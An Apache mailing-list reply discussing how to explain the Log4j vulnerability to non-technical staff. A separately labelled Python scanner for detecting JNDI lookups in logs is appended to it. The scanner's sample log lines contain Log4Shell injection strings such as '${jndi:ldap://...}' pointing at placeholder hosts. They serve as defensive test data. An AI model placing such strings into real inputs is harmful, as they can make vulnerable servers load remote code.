Hi.

On Mon, 17 Jan 2022 at 02:20, Sam Ruby <[email protected]> wrote:
>
> On Sun, Jan 16, 2022 at 6:59 PM Gilles Sadowski <[email protected]>
> wrote:
>
> > On Sun, 16 Jan 2022 at 22:27, Sam Ruby <[email protected]> wrote:
> > >
> > > On Sun, Jan 16, 2022 at 1:49 PM Dominik Psenner <[email protected]>
> > wrote:
> > >
> > > > I have no intention to tear apart the document. I am dealing with non-
> > > > technical fellows on a daily basis and from my experience the document
> > > > is still too technical.
> > > >
> > >
> > > That's what I was afraid of, and what I very much want to fix.
> >
> > From [1]:
> > ---CUT---
> > Log4j is a chunk of laptop code that builders can put into purposes
> > to watch, or “log”, something from mundane operations to vital alerts.
> > Those detailed logs may also help programmers debug software and
> > is used by tens of millions of purposes.
> > ---CUT---
> >
> > How much less technical can it be?
> >
> >
> No.  They've read that.  It doesn't answer their questions.  They have come
> to us to get the answers.
>
> Analogy: my car is broken.  I take it in to be fixed.  The mechanic starts
> to explain how the car works.  I stop him and ask him how much the car will
> cost to be fixed and when it will be ready.  The mechanic responds by
> explaining how the car works in simpler terms.
>
> Feel free to update the page, but my opinion is that the description you
> cited doesn't answer any question the user may be wanting to ask.

Of course, I agree that it neither explains the issue, nor is it a plan
to "ensure that it doesn't happen again".
My point was only that further simplification cannot be the basis of
a constructive discussion.

Daniel Shahaf showed brilliantly that a wrong analogy and a wrong
association could "simply" (but wrongly) identify the cause as "open
source".

>  See
> below.
>
> [...]

Thanks for the description of the discussion that took place and
the (unfortunately, not surprising) mindset of the attendance.

>
> I would love to move everything currently on that page to be background
> material or delete it entirely and start over if we can find a way to
> address the questions I describe above.  Heck the background material could
> even go into how JNDI extends LDAP to cover Java Objects, and log4j allowed
> (past tense) the data to be logged to point their queries at an attacker's
> server who could respond not with the answer to the question posed but with
> instructions on how to load their Java Object, and why that is a very bad
> thing, and how you had to know about things like CORBA and RMI that were
> popular 25 years ago to even figure this out.

I think that it is (or will be) quite useful to have such technical details
when (some of the) "staffers" get to the point where they can make
some sense out of it, and consequently focus on the right questions.

Regards,
Gilles
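As an added example (not from this thread or from the log4j project): a small defender-side scanner for the pattern Sam describes above, logged data that carries a JNDI lookup pointing at a remote LDAP or RMI server. The log lines and host names are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample log lines; the lookup hosts are placeholders, not real servers.
SAMPLE_LOG_LINES = [
    '2022-01-16T18:59:01Z INFO  login user="alice" agent="Mozilla/5.0"',
    '2022-01-16T18:59:02Z INFO  login user="${jndi:ldap://lookup.example.invalid:1389/a}"',
    '2022-01-16T18:59:03Z WARN  request path="/search?q=${jndi:rmi://lookup.example.invalid/obj}"',
    '2022-01-16T18:59:04Z INFO  banner="${date:yyyy-MM-dd} build ${env:BUILD_ID}"',
]

# Log4j 2 lookup syntax is ${prefix:key}; lookups may nest, so this pattern matches
# the innermost ${...} (no $, { or } inside) and the caller walks outward from it.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# JNDI schemes that make the logging process contact a server chosen by whoever
# controlled the logged data (LDAP and RMI are the ones discussed in the thread).
REMOTE_SCHEMES = {"ldap", "ldaps", "rmi", "dns"}


def find_jndi_lookups(line):
    """Return (scheme, host) for every JNDI lookup in a log line, innermost first."""
    found = []
    remaining = line
    while True:
        match = LOOKUP_RE.search(remaining)
        if not match:
            return found
        prefix, _, key = match.group(1).partition(":")
        if prefix.strip().lower() == "jndi":
            url = urlsplit(key)
            found.append((url.scheme.lower(), url.hostname))
        # Collapse the examined lookup so an enclosing ${...} can be matched next.
        remaining = remaining[:match.start()] + "<lookup>" + remaining[match.end():]


def scan(lines):
    """Map line index -> list of (scheme, host) for lines carrying JNDI lookups."""
    hits = {}
    for index, line in enumerate(lines):
        lookups = find_jndi_lookups(line)
        if lookups:
            hits[index] = lookups
    return hits


if __name__ == "__main__":
    for index, lookups in scan(SAMPLE_LOG_LINES).items():
        for scheme, host in lookups:
            kind = "remote" if scheme in REMOTE_SCHEMES else "other"
            print(f"line {index}: {kind} JNDI lookup via {scheme} to {host}")
```

Run against real logs, a hit means the logged field reached the logger unchanged; whether a lookup was actually performed depends on the log4j version and configuration in use, which the scanner does not know.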
